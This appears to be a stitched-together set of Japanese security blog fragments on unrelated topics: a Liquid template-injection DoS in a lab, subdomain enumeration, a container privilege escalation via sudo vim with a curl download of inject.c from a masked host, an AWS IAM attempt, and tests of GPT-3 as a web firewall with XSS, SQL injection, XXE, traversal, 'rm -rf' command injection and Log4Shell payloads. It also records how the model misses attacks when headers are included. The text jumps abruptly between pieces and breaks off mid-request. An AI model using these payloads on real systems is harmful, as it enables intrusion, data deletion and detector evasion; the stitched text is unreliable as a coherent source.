We just published a detailed analysis of #CVE-2023-3519, which we previously wrote about. Today, we’re going even further into how this #RCE vulnerability can be exploited.
8位 605 pt - Linux kernel の権限昇格の可能性の脆弱性 (CVE-2023-0386)
リポジトリ数: 8 / スター数: 525
一般権限アカウントで脆弱な Linux システムへの侵入に成功した攻撃者は、root 権限への昇格が可能
CVE-2023-0386: linux kernel - OverlayFS subsystem in how a user copies a capable file from a nosuid mount into another mount. This uid mapping bug allows a local user to escalate their privileges on the system.
$ cat results.json | head -n 20
[
{
"plugin": "networkAccessDefaultAction",
"category": "Storage Accounts",
"title": "Network Access Default Action",
"description": "Ensures that Storage Account access is restricted to trusted networks",
"resource": "N/A",
"region": "eastus",
"status": "OK",
"message": "No storage accounts found",
"compliance": "PCI: PCI requires data access to be configured to use a firewall. Removing the default network access action enables a more granular level of access controls."
},
(以下省略)
# time curl 'http://127.0.0.1:4567/liquid?name=%7B%25+for+i+in+%281..10%29+%25%7D%0D%0A%7B%25+assign+hoge+%3D+i+%7C+plus%3A+i+%25%7D%0D%0A%7B%25+endfor+%25%7D'
hi
real 0m0.018s
1,000 回ループ → 0.023 秒
# time curl 'http://127.0.0.1:4567/liquid?name=%7B%25+for+i+in+%281..1000%29+%25%7D%0D%0A%7B%25+assign+hoge+%3D+i+%7C+plus%3A+i+%25%7D%0D%0A%7B%25+endfor+%25%7D'
hi
real 0m0.023s
1,000,000 回ループ → 6.387 秒
# time curl 'http://127.0.0.1:4567/liquid?name=%7B%25+for+i+in+%281..1000000%29+%25%7D%0D%0A%7B%25+assign+hoge+%3D+i+%7C+plus%3A+i+%25%7D%0D%0A%7B%25+endfor+%25%7D'
hi
real 0m6.387s
100,000,000 回ループ → 1 分 5.994 秒
# time curl 'http://127.0.0.1:4567/liquid?name=%7B%25+for+i+in+%281..10000000%29+%25%7D%0D%0A%7B%25+assign+hoge+%3D+i+%7C+plus%3A+i+%25%7D%0D%0A%7B%25+endfor+%25%7D'
hi
real 1m5.994s
top コマンドでサーバ上の負荷を確してみます。「%Cpu(s): 99.3 us」となっておりサーバに負荷が掛かっていることが確認できました。
top - 08:30:47 up 31 min, 2 users, load average: 0.59, 0.53, 0.26
Tasks: 115 total, 1 running, 69 sleeping, 0 stopped, 0 zombie
%Cpu(s): 99.3 us, 0.7 sy, 0.0 ni, 0.0 id, 0.0 wa, 0.0 hi, 0.0 si, 0.0 st
KiB Mem : 2006252 total, 1560000 free, 249416 used, 196836 buff/cache
KiB Swap: 0 total, 0 free, 0 used. 1614816 avail Mem
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
2806 root 20 0 319712 111484 8452 S 99.3 5.6 0:04.44 ruby
大量ループでシステムを落とす
さらにループ回数を増やしてシステムを落とすことが可能かを確認します。
1. ターミナル(標的)
サーバを起動します。
# docker-compose up
[+] Running 1/0
⠿ Container liquid-erb-ssti-app-1 Created
Attaching to liquid-erb-ssti-app-1
liquid-erb-ssti-app-1 | [2023-07-15 08:32:36] INFO WEBrick 1.6.1
liquid-erb-ssti-app-1 | [2023-07-15 08:32:36] INFO ruby 2.7.8 (2023-03-30) [x86_64-linux]
liquid-erb-ssti-app-1 | == Sinatra (v3.0.6) has taken the stage on 4567 for development with backup from WEBrick
liquid-erb-ssti-app-1 | [2023-07-15 08:32:36] INFO WEBrick::HTTPServer#start: pid=7 port=4567
2. ターミナル(攻撃者)
先の検証よりループ回数を増やしたテンプレートをインジェクションします。
# curl 'http://xxx.yyy.zzz.221:4567/liquid?name=%7B%25+for+i+in+%281..10000000000%29+%25%7D%0D%0A%7B%25+assign+hoge+%3D+i+%25%7D%0D%0A%7B%25+endfor+%25%7D'
curl: (52) Empty reply from server
3. ターミナル(標的)
しばらくすると、サーバが落ちました。
liquid-erb-ssti-app-1 | Killed
liquid-erb-ssti-app-1 exited with code 137
これでサーバサイド・テンプレート・インジェクション経由の DoS でシステムを落とすことができることを確認できました。
# ./subfinder -d motikan2010.com -v
__ _____ __
_______ __/ /_ / __(_)___ ____/ /__ _____
/ ___/ / / / __ \/ /_/ / __ \/ __ / _ \/ ___/
(__ ) /_/ / /_/ / __/ / / / / /_/ / __/ /
/____/\__,_/_.___/_/ /_/_/ /_/\__,_/\___/_/
projectdiscovery.io
[INF] Current subfinder version v2.6.0 (latest)
[INF] Loading provider config from /root/.config/subfinder/provider-config.yaml
[DBG] Selected source(s) for this search: anubis, fofa, riddler, censys, crtsh, fullhunt, whoisxmlapi, certspotter, chinaz, digitorus, quake, virustotal, bufferover, chaos, dnsrepo, hackertarget, bevigil, leakix, shodan, hunter, intelx, passivetotal, securitytrails, c99, dnsdumpster, alienvault, robtex
[INF] Enumerating subdomains for motikan2010.com
[DBG] Cannot use the whoisxmlapi source because there was no API key/secret defined for it.
[DBG] Cannot use the passivetotal source because there was no API key/secret defined for it.
[DBG] Cannot use the securitytrails source because there was no API key/secret defined for it.
[DBG] Cannot use the intelx source because there was no API key/secret defined for it.
[DBG] Cannot use the shodan source because there was no API key/secret defined for it.
[DBG] Cannot use the certspotter source because there was no API key/secret defined for it.
[DBG] Cannot use the quake source because there was no API key/secret defined for it.
[DBG] Cannot use the virustotal source because there was no API key/secret defined for it.
[DBG] Cannot use the bevigil source because there was no API key/secret defined for it.
[DBG] Cannot use the leakix source because there was no API key/secret defined for it.
[DBG] Cannot use the hunter source because there was no API key/secret defined for it.
[DBG] Cannot use the c99 source because there was no API key/secret defined for it.
[DBG] Cannot use the fofa source because there was no API key/secret defined for it.
[DBG] Cannot use the robtex source because there was no API key/secret defined for it.
[DBG] Cannot use the censys source because there was no API key/secret defined for it.
[DBG] Cannot use the fullhunt source because there was no API key/secret defined for it.
[DBG] Cannot use the dnsrepo source because there was no API key/secret defined for it.
[DBG] Cannot use the chaos source because there was no API key/secret defined for it.
[DBG] Cannot use the chinaz source because there was no API key/secret defined for it.
[DBG] Cannot use the bufferover source because there was no API key/secret defined for it.
[DBG] Response for failed request against https://jonlu.ca/anubis/subdomains/motikan2010.com:
[]
[WRN] Could not run source anubis: unexpected status code 300 received from https://jonlu.ca/anubis/subdomains/motikan2010.com
[digitorus] motikan2010.com
[alienvault] blog.motikan2010.com
[alienvault] www.motikan2010.com
[DBG] Response for failed request against https://riddler.io/search?q=pld:motikan2010.com&view_type=data_table:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<HTML><HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1">
<TITLE>ERROR: The request could not be satisfied</TITLE>
</HEAD><BODY>
<H1>403 ERROR</H1>
<H2>The request could not be satisfied.</H2>
<HR noshade size="1px">
Request blocked.
We can't connect to the server for this app or website at this time. There might be too much traffic or a configuration error. Try again later, or contact the app or website owner.
<BR clear="all">
If you provide content to customers through CloudFront, you can find steps to troubleshoot and help prevent this error by reviewing the CloudFront documentation.
<BR clear="all">
<HR noshade size="1px">
<PRE>
Generated by cloudfront (CloudFront)
Request ID: 43OkGZsMblidN8c685tqsQfTqu5FTpj6M4DOIxOLhlQH2yuJrMqe3A==
</PRE>
<ADDRESS>
</ADDRESS>
</BODY></HTML>
[WRN] Could not run source riddler: unexpected status code 403 received from https://riddler.io/search?q=pld:motikan2010.com&view_type=data_table
[leakix] blog.motikan2010.com
[leakix] www.motikan2010.com
[hackertarget] namatube.motikan2010.com
[hackertarget] mymacmate.motikan2010.com
[hackertarget] md-to-pdf.motikan2010.com
[hackertarget] once-tech.motikan2010.com
[hackertarget] chosensya-maker.motikan2010.com
[hackertarget] hacker-trends.motikan2010.com
[dnsdumpster] namatube.motikan2010.com
[dnsdumpster] mymacmate.motikan2010.com
[dnsdumpster] md-to-pdf.motikan2010.com
[dnsdumpster] once-tech.motikan2010.com
[dnsdumpster] chosensya-maker.motikan2010.com
[dnsdumpster] hacker-trends.motikan2010.com
[crtsh] www.motikan2010.com
[crtsh] blog.motikan2010.com
[crtsh] motikan2010.com
[crtsh] dev.motikan2010.com
[crtsh] pre.motikan2010.com
[crtsh] stg2.motikan2010.com
[crtsh] stg.motikan2010.com
[crtsh] sample.motikan2010.com
dev.motikan2010.com
pre.motikan2010.com
stg.motikan2010.com
blog.motikan2010.com
namatube.motikan2010.com
md-to-pdf.motikan2010.com
sample.motikan2010.com
www.motikan2010.com
chosensya-maker.motikan2010.com
hacker-trends.motikan2010.com
stg2.motikan2010.com
motikan2010.com
mymacmate.motikan2010.com
once-tech.motikan2010.com
[INF] Found 14 subdomains for motikan2010.com in 7 seconds 674 milliseconds
$ curl -m 5 http://169.254.169.254/latest/meta-data/
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- 0:00:05 --:--:-- 0
curl: (28) Connection timed out after 5000 milliseconds
メタデータサービスにもアクセスができませんでした。
ケイパビリティを確認 (www-data ユーザ)
「capsh」コマンドで有効になっているケイパビリティ(capability)の設定を確認します。
「Current:=」フィールドが空となっているため、十分な権限がないことが確認できます。
$ capsh --print
Current: =
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap
Ambient set =
Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
secure-no-ambient-raise: no (unlocked)
uid=33(www-data) euid=33(www-data)
gid=33(www-data)
groups=33(www-data)
Guessed mode: UNCERTAIN (0)
コンテナ内でroot権限を取得
コンテナ内でroot権限のシェルを取得していきます。
手始めに「sudo su」コマンドでrootになれないかを試してみましたができないようでした。
$ sudo su
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
sudo: a terminal is required to read the password; either use the -S option to read from standard input or configure an askpass helper
sudo: a password is required
sudo可能なコマンドを確認
現在のユーザでsudo可能なコマンド一覧を確認するために「sudo -l」コマンドを実行します。
$ sudo -l
Matching Defaults entries for www-data on 533e4e3fac01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on 533e4e3fac01:
(root) NOPASSWD: /usr/bin/vim /var/www/html/documents
$ sudo /usr/bin/vim /var/www/html/documents
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal
E558: Terminal entry not found in terminfo
'unknown' not known. Available builtin terminals are:
builtin_amiga
builtin_ansi
builtin_pcansi
builtin_win32
builtin_vt320
builtin_vt52
builtin_xterm
builtin_iris-ansi
builtin_debug
builtin_dumb
defaulting to 'ansi'
capsh --print
Current: cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap=ep
Bounding set =cap_chown,cap_dac_override,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_net_bind_service,cap_net_raw,cap_sys_chroot,cap_sys_ptrace,cap_mknod,cap_audit_write,cap_setfcap
Ambient set =
Current IAB: !cap_dac_read_search,!cap_linux_immutable,!cap_net_broadcast,!cap_net_admin,!cap_ipc_lock,!cap_ipc_owner,!cap_sys_module,!cap_sys_rawio,!cap_sys_pacct,!cap_sys_admin,!cap_sys_boot,!cap_sys_nice,!cap_sys_resource,!cap_sys_time,!cap_sys_tty_config,!cap_lease,!cap_audit_control,!cap_mac_override,!cap_mac_admin,!cap_syslog,!cap_wake_alarm,!cap_block_suspend,!cap_audit_read
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
secure-no-ambient-raise: no (unlocked)
uid=0(root) euid=0(root)
gid=0(root)
groups=0(root)
Guessed mode: UNCERTAIN (0)
root@533e4e3fac01:/# curl http://164.xxx.yyy.xxx/inject.c -o inject.c
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2185 100 2185 0 0 6207 0 --:--:-- --:--:-- --:--:-- 6189
An error occurred (AccessDenied) when calling the CreateUser operation: User: arn:aws:sts::364300000000:assumed-role/ecs-instance-role/i-00b41f7908dc8d792 is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::364300000000:user/hacker because no permissions boundary allows the iam:CreateUser action
原因を調べるために、ロールの詳細を確認してみます。
ecs-instance-role ロールの詳細を確認 (aws iam get-role)
ロール「ecs-instance-role」の詳細を確認してみます。
$ aws iam get-role --role-name ecs-instance-role
ロールに「aws-goat-instance-boundary-policy」というポリシーの アクセス許可境界(Permissions Boundary) が設定されており、AWS IAM のアクションに制限が掛けられていると推測できます。
そのためAWSユーザの作成が失敗したと考えられます。
no-port-forwarding,no-agent-forwarding,command="echo 'Please login as the user \"ubuntu\" rather than the user \"root\".';echo;sleep 10;exit 142" ssh-ed25519 AAAA...
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
REFERER: http://127.0.0.1/
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: same-origin
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
CONTENT-TYPE: application/x-www-form-urlencoded
ORIGIN: http://127.0.0.1
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONTENT-LENGTH: 62
CONNECTION: keep-alive
HOST: 127.0.0.1
msg=TEST%0D%0A&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
以下が GPT-3 からの返答です。
No, this is not a cyber attack.
It is an HTTP request, which is a common way for computers to communicate with web servers.
XSS
GETパラメータ
GET:<script>alert(document.cookie)</script>
2.83 秒
検出あり
期待通り、攻撃と判定されWAFによってリクエストがブロックされました!
「Cookieを盗もうとしているスクリプトが含まれている」と概要も含まれています。
Is the following HTTP request a cyber attack?
-----
GET /?p=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: none
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CONNECTION: keep-alive
HOST: 127.0.0.1
Yes, this HTTP request is a cyber attack.
It contains a malicious script that could be used to access and steal cookies from the user's browser.
攻撃と判定されたので下画像のように403エラーが返却されました。意図した動作になっているようです。
(以後このスクリーンショットは省略します。)
POSTデータ
POST:<script>alert(document.cookie)</script>
2.98 秒
検出なし
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
REFERER: http://127.0.0.1/
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: same-origin
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
CONTENT-TYPE: application/x-www-form-urlencoded
ORIGIN: http://127.0.0.1
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONTENT-LENGTH: 105
CONNECTION: keep-alive
HOST: 127.0.0.1
msg=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
No, this is not a cyber attack. This is a normal HTTP request.
POSTデータ & ヘッダ無し
POST:<script>alert(document.cookie)</script>
6.88 秒
検出あり
GPT-3 に対してヘッダ情報を送信しなかった場合は検出されるようになりました。
ヘッダ情報がノイズになっていると考えられるため、以後ヘッダ有りと無しで攻撃判定を確認していきます。
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
msg=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
Yes, this is a cyber attack.
The request contains a malicious script that can be used to steal the user's cookies.
SQL インジェクション
GETパラメータ
GET:1 OR SLEEP(25)=0 LIMIT 1--
3.75 秒
検出あり
Is the following HTTP request a cyber attack?
-----
GET /post?p=1%20OR%20SLEEP(25)=0%20LIMIT%201--%20 HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: none
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONNECTION: keep-alive
HOST: 127.0.0.1
Yes, this HTTP request is a cyber attack.
It is attempting to exploit a vulnerability in the application by using a SQL injection attack.
GETパラメータ & ヘッダ無し
3.23 秒
検出あり
Is the following HTTP request a cyber attack?
-----
GET /post?p=1%20OR%20SLEEP(25)=0%20LIMIT%201--%20 HTTP/1.1
Yes, this HTTP request is a cyber attack. It is an example of a SQL injection attack,
which is a type of attack that attempts to inject malicious code into a database.
XXE
POSTパラメータ①
POST:<!ENTITY xxe SYSTEM "file:///dev/random" >]>
8.01 秒
検出なし
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
REFERER: http://127.0.0.1/
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: same-origin
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
CONTENT-TYPE: application/x-www-form-urlencoded
ORIGIN: http://127.0.0.1
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: max-age=0
CONTENT-LENGTH: 291
CONNECTION: keep-alive
HOST: 127.0.0.1
msg=%3C%3Fxml++version%3D%221.0%22+encoding%3D%22ISO-8859-1%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A+++%3C%21ELEMENT+foo+ANY+%3E%0D%0A+++%3C%21ENTITY+xxe+SYSTEM++%22file%3A%2F%2F%2Fdev%2Frandom%22+%3E%5D%3E%0D%0A%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
No, this is not a cyber attack. This is a legitimate HTTP request.
POSTパラメータ②
攻撃シグネチャを少し修正して再度挑戦。
POST :<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
10.00 秒
検出なし
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
REFERER: http://127.0.0.1/
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: same-origin
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
CONTENT-TYPE: application/x-www-form-urlencoded
ORIGIN: http://127.0.0.1
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONTENT-LENGTH: 287
CONNECTION: keep-alive
HOST: 127.0.0.1
msg=%3C%3Fxml+version%3D%221.0%22+encoding%3D%22ISO-8859-1%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fetc%2Fpasswd%22+%3E%5D%3E%0D%0A%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
No, this HTTP request is not a cyber attack.
It is a legitimate request for a web page.
POSTパラメータ & ヘッダ無し
POST :<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
4.36 秒
検出あり
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
msg=%3C%3Fxml++version%3D%221.0%22+encoding%3D%22ISO-8859-1%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A+++%3C%21ELEMENT+foo+ANY+%3E%0D%0A+++%3C%21ENTITY+xxe+SYSTEM++%22file%3A%2F%2F%2Fdev%2Frandom%22+%3E%5D%3E%0D%0A%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E&_token=Qu5lkUoatVRwANAHzWEUKMdRrLBcCcS7Np3Nxpsu
Yes, this is a cyber attack. It is an example of an XML External Entity (XXE) attack,
which is an attack vector that exploits a web application's processing of XML documents.
The attacker is attempting to inject malicious code into the application by sending an XML document with a malicious entity reference.
パストラバーサル
GETパラメータ
GET:../../../../etc/passwd
3.25 秒
検出なし
Is the following HTTP request a cyber attack?
-----
GET /?file=../../../../etc/passwd HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: none
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONNECTION: keep-alive
HOST: 127.0.0.1
No, this HTTP request is not a cyber attack.
It is a normal request for a file, and it does not contain any malicious code.
GETパラメータ & ヘッダ無し
GET:../../../../etc/passwd
3.77 秒
検出あり
Is the following HTTP request a cyber attack?
-----
GET /?file=../../../../etc/passwd HTTP/1.1
Yes, this is a type of cyber attack known as a directory traversal attack.
OS コマンドインジェクション
GET:;id
2.35 秒
検出なし
短い攻撃シグネチャを検出有無が気になる点。
[2023-02-21 13:13:46] local.INFO: Is the following HTTP request a cyber attack?
-----
GET /?filename=bob.txt;id HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: none
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONNECTION: keep-alive
HOST: 127.0.0.1
No, this is not a cyber attack. It is an HTTP request.
GETパラメータ & ヘッダー無し
GET:;id
4.61 秒
検出なし
Is the following HTTP request a cyber attack?
-----
GET /?filename=bob.txt;id HTTP/1.1
It depends. This request is not necessarily a cyber attack, but it could be a sign of malicious intent.
It could be an attempt to access a file that should not be accessible, or to run a command on the server.
Is the following HTTP request a cyber attack?
-----
GET /?filename=bob.txt;%20rm%20-rf%20/var/log/nginx/access.log HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
SEC-FETCH-DEST: document
SEC-FETCH-USER: ?1
SEC-FETCH-MODE: navigate
SEC-FETCH-SITE: none
ACCEPT: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
USER-AGENT: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
UPGRADE-INSECURE-REQUESTS: 1
SEC-CH-UA-PLATFORM: "macOS"
SEC-CH-UA-MOBILE: ?0
SEC-CH-UA: "Chromium";v="110", "Not A(Brand";v="24", "Google Chrome";v="110"
CACHE-CONTROL: no-cache
PRAGMA: no-cache
CONNECTION: keep-alive
HOST: 127.0.0.1
Yes, this HTTP request is a cyber attack.
The request contains a malicious command to delete the nginx access log from the server,
which is an attempt to damage the system.
今度はブロックされました。Nginxアクセスログを削除するコマンドだと判定する余裕感。
Log4Shell
次からは特定プロダクトを標的として攻撃リクエストの判定を行なっていきます。
POSTパラメータ
POST:${jndi:ldap://127.0.0.1:1389/a}
4.16 秒
検出なし
Is the following HTTP request a cyber attack?
-----
POST /post HTTP/1.1
ACCEPT-LANGUAGE: ja-JP,ja;q=0.9,en-US;q=0.8,en;q=0.7,da;q=0.6,zh-CN;q=0.5,zh-TW;q=0.4,zh;q=0.3
ACCEPT-ENCODING: gzip, deflate, br
REFERER: http://127.0.0.1/?
SEC-FETCH-DEST: document
